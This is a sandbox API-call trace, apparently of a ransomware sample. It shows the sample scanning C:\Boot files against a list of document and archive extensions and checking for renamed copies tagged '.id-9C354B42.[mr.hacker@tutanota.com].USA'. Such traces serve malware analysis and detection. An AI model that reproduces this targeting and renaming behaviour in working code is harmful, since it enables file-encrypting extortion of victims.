[0035.223] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.223] lstrlenW (lpString=".pdf") returned 4 [0035.223] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.223] lstrlenW (lpString=".xls") returned 4 [0035.223] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.223] lstrlenW (lpString=".xlsx") returned 5 [0035.223] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.223] lstrlenW (lpString=".ppt") returned 4 [0035.223] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.223] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.223] lstrlenW (lpString=".zip") returned 4 [0035.223] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.223] lstrlenW (lpString=".rar") returned 4 [0035.223] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.223] lstrlenW (lpString=".bz2") returned 4 [0035.223] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.223] lstrlenW (lpString=".7z") returned 3 [0035.223] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.223] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.223] lstrlenW (lpString=".dbf") returned 4 [0035.223] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.223] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.223] lstrlenW (lpString=".1cd") returned 4 [0035.224] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.224] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.224] lstrlenW (lpString=".jpg") returned 4 [0035.224] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.224] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.224] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.225] lstrlenW (lpString=".doc") returned 4 [0035.225] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.225] lstrlenW (lpString=".docx") returned 5 [0035.225] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.225] lstrlenW (lpString=".pdf") returned 4 [0035.225] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.225] lstrlenW (lpString=".xls") returned 4 [0035.225] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.225] lstrlenW (lpString=".xlsx") returned 5 [0035.225] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.225] lstrlenW (lpString=".ppt") returned 4 [0035.225] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.225] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.225] lstrlenW (lpString=".zip") returned 4 [0035.225] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.225] lstrlenW (lpString=".rar") returned 4 [0035.225] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.225] lstrlenW (lpString=".bz2") returned 4 [0035.225] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.225] lstrlenW (lpString=".7z") returned 3 [0035.225] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.225] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.225] lstrlenW (lpString=".dbf") returned 4 [0035.225] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.225] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.225] lstrlenW (lpString=".1cd") returned 4 [0035.225] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.225] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0035.225] lstrlenW (lpString=".jpg") returned 4 [0035.226] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.226] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0035.226] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.226] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.226] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=93248) returned 1 [0035.226] CloseHandle (hObject=0x1b8) returned 1 [0035.226] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0035.226] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.226] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.226] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.226] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.226] lstrlenW (lpString=".doc") returned 4 [0035.226] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.226] lstrlenW (lpString=".docx") returned 5 [0035.227] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.227] lstrlenW (lpString=".pdf") returned 4 [0035.227] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.227] lstrlenW (lpString=".xls") returned 4 [0035.227] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.227] lstrlenW (lpString=".xlsx") returned 5 [0035.227] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.227] lstrlenW (lpString=".ppt") returned 4 [0035.227] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.227] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.227] lstrlenW (lpString=".zip") returned 4 [0035.227] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.227] lstrlenW (lpString=".rar") returned 4 [0035.227] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.227] lstrlenW (lpString=".bz2") returned 4 [0035.227] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.227] lstrlenW (lpString=".7z") returned 3 [0035.227] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.227] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.227] lstrlenW (lpString=".dbf") returned 4 [0035.227] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.227] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.227] lstrlenW (lpString=".1cd") returned 4 [0035.227] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.227] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.227] lstrlenW (lpString=".jpg") returned 4 [0035.227] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.227] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.227] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.227] lstrlenW (lpString=".doc") returned 4 [0035.227] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.227] lstrlenW (lpString=".docx") returned 5 [0035.227] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.228] lstrlenW (lpString=".pdf") returned 4 [0035.228] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.228] lstrlenW (lpString=".xls") returned 4 [0035.228] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.228] lstrlenW (lpString=".xlsx") returned 5 [0035.228] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.228] lstrlenW (lpString=".ppt") returned 4 [0035.228] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.228] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.228] lstrlenW (lpString=".zip") returned 4 [0035.228] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.228] lstrlenW (lpString=".rar") returned 4 [0035.228] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.228] lstrlenW (lpString=".bz2") returned 4 [0035.228] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.228] lstrlenW (lpString=".7z") returned 3 [0035.228] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.228] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.228] lstrlenW (lpString=".dbf") returned 4 [0035.228] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.228] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.228] lstrlenW (lpString=".1cd") returned 4 [0035.228] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.228] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.228] lstrlenW (lpString=".jpg") returned 4 [0035.228] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.228] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0035.228] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.229] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.229] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=90688) returned 1 [0035.229] CloseHandle (hObject=0x1b8) returned 1 [0035.229] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0035.229] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.229] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.229] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.229] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.229] lstrlenW (lpString=".doc") returned 4 [0035.229] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.229] lstrlenW (lpString=".docx") returned 5 [0035.229] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.229] lstrlenW (lpString=".pdf") returned 4 [0035.229] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.229] lstrlenW (lpString=".xls") returned 4 [0035.229] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.229] lstrlenW (lpString=".xlsx") returned 5 [0035.229] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.229] lstrlenW (lpString=".ppt") returned 4 [0035.229] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.229] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.229] lstrlenW (lpString=".zip") returned 4 [0035.230] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.230] lstrlenW (lpString=".rar") returned 4 [0035.230] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.230] lstrlenW (lpString=".bz2") returned 4 [0035.230] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.230] lstrlenW (lpString=".7z") returned 3 [0035.230] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.230] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.230] lstrlenW (lpString=".dbf") returned 4 [0035.230] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.230] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.230] lstrlenW (lpString=".1cd") returned 4 [0035.230] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.230] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.230] lstrlenW (lpString=".jpg") returned 4 [0035.230] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.230] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.230] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.230] lstrlenW (lpString=".doc") returned 4 [0035.230] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.230] lstrlenW (lpString=".docx") returned 5 [0035.230] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.230] lstrlenW (lpString=".pdf") returned 4 [0035.230] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.230] lstrlenW (lpString=".xls") returned 4 [0035.230] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.230] lstrlenW (lpString=".xlsx") returned 5 [0035.230] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.230] lstrlenW (lpString=".ppt") returned 4 [0035.230] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.230] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.231] lstrlenW (lpString=".zip") returned 4 [0035.231] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.231] lstrlenW (lpString=".rar") returned 4 [0035.231] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.231] lstrlenW (lpString=".bz2") returned 4 [0035.231] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.231] lstrlenW (lpString=".7z") returned 3 [0035.231] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.231] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.231] lstrlenW (lpString=".dbf") returned 4 [0035.231] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.231] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.231] lstrlenW (lpString=".1cd") returned 4 [0035.231] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.231] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.231] lstrlenW (lpString=".jpg") returned 4 [0035.231] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.231] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0035.231] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.231] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.232] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=90704) returned 1 [0035.232] CloseHandle (hObject=0x1b8) returned 1 [0035.232] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0035.232] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.232] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.232] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.232] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.232] lstrlenW (lpString=".doc") returned 4 [0035.232] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.232] lstrlenW (lpString=".docx") returned 5 [0035.232] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.232] lstrlenW (lpString=".pdf") returned 4 [0035.232] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.232] lstrlenW (lpString=".xls") returned 4 [0035.232] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.232] lstrlenW (lpString=".xlsx") returned 5 [0035.232] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.232] lstrlenW (lpString=".ppt") returned 4 [0035.232] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.232] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.232] lstrlenW (lpString=".zip") returned 4 [0035.232] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.232] lstrlenW (lpString=".rar") returned 4 [0035.232] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.232] lstrlenW (lpString=".bz2") returned 4 [0035.232] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.232] lstrlenW (lpString=".7z") returned 3 [0035.233] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.233] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.233] lstrlenW (lpString=".dbf") returned 4 [0035.233] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.233] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.233] lstrlenW (lpString=".1cd") returned 4 [0035.233] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.233] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.233] lstrlenW (lpString=".jpg") returned 4 [0035.233] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.233] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.233] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.233] lstrlenW (lpString=".doc") returned 4 [0035.233] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.233] lstrlenW (lpString=".docx") returned 5 [0035.233] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.233] lstrlenW (lpString=".pdf") returned 4 [0035.233] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.233] lstrlenW (lpString=".xls") returned 4 [0035.233] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.233] lstrlenW (lpString=".xlsx") returned 5 [0035.233] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.233] lstrlenW (lpString=".ppt") returned 4 [0035.233] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.233] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.233] lstrlenW (lpString=".zip") returned 4 [0035.233] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.233] lstrlenW (lpString=".rar") returned 4 [0035.233] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.233] lstrlenW (lpString=".bz2") returned 4 [0035.233] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.234] lstrlenW (lpString=".7z") returned 3 [0035.234] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.234] lstrlenW (lpString=".dbf") returned 4 [0035.234] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.234] lstrlenW (lpString=".1cd") returned 4 [0035.234] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.234] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.234] lstrlenW (lpString=".jpg") returned 4 [0035.234] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.234] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0035.234] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.234] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.234] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=76352) returned 1 [0035.234] CloseHandle (hObject=0x1b8) returned 1 [0035.234] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0035.234] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.234] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.235] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.235] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.235] lstrlenW (lpString=".doc") returned 4 [0035.235] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.235] lstrlenW (lpString=".docx") returned 5 [0035.235] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.235] lstrlenW (lpString=".pdf") returned 4 [0035.235] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.235] lstrlenW (lpString=".xls") returned 4 [0035.235] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.235] lstrlenW (lpString=".xlsx") returned 5 [0035.235] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.235] lstrlenW (lpString=".ppt") returned 4 [0035.235] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.235] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.235] lstrlenW (lpString=".zip") returned 4 [0035.235] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.235] lstrlenW (lpString=".rar") returned 4 [0035.235] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.235] lstrlenW (lpString=".bz2") returned 4 [0035.235] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.235] lstrlenW (lpString=".7z") returned 3 [0035.235] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.235] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.235] lstrlenW (lpString=".dbf") returned 4 [0035.235] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.235] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.235] lstrlenW (lpString=".1cd") returned 4 [0035.235] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.235] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.235] lstrlenW (lpString=".jpg") returned 4 [0035.235] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".doc") returned 4 [0035.236] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString=".docx") returned 5 [0035.236] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.236] lstrlenW (lpString=".pdf") returned 4 [0035.236] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".xls") returned 4 [0035.236] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".xlsx") returned 5 [0035.236] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.236] lstrlenW (lpString=".ppt") returned 4 [0035.236] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".zip") returned 4 [0035.236] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".rar") returned 4 [0035.236] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.236] lstrlenW (lpString=".bz2") returned 4 [0035.236] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString=".7z") returned 3 [0035.236] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.236] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".dbf") returned 4 [0035.236] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".1cd") returned 4 [0035.236] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.236] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.236] lstrlenW (lpString=".jpg") returned 4 [0035.236] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.237] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0035.237] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.237] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.237] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=75344) returned 1 [0035.237] CloseHandle (hObject=0x1b8) returned 1 [0035.237] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0035.237] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.237] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 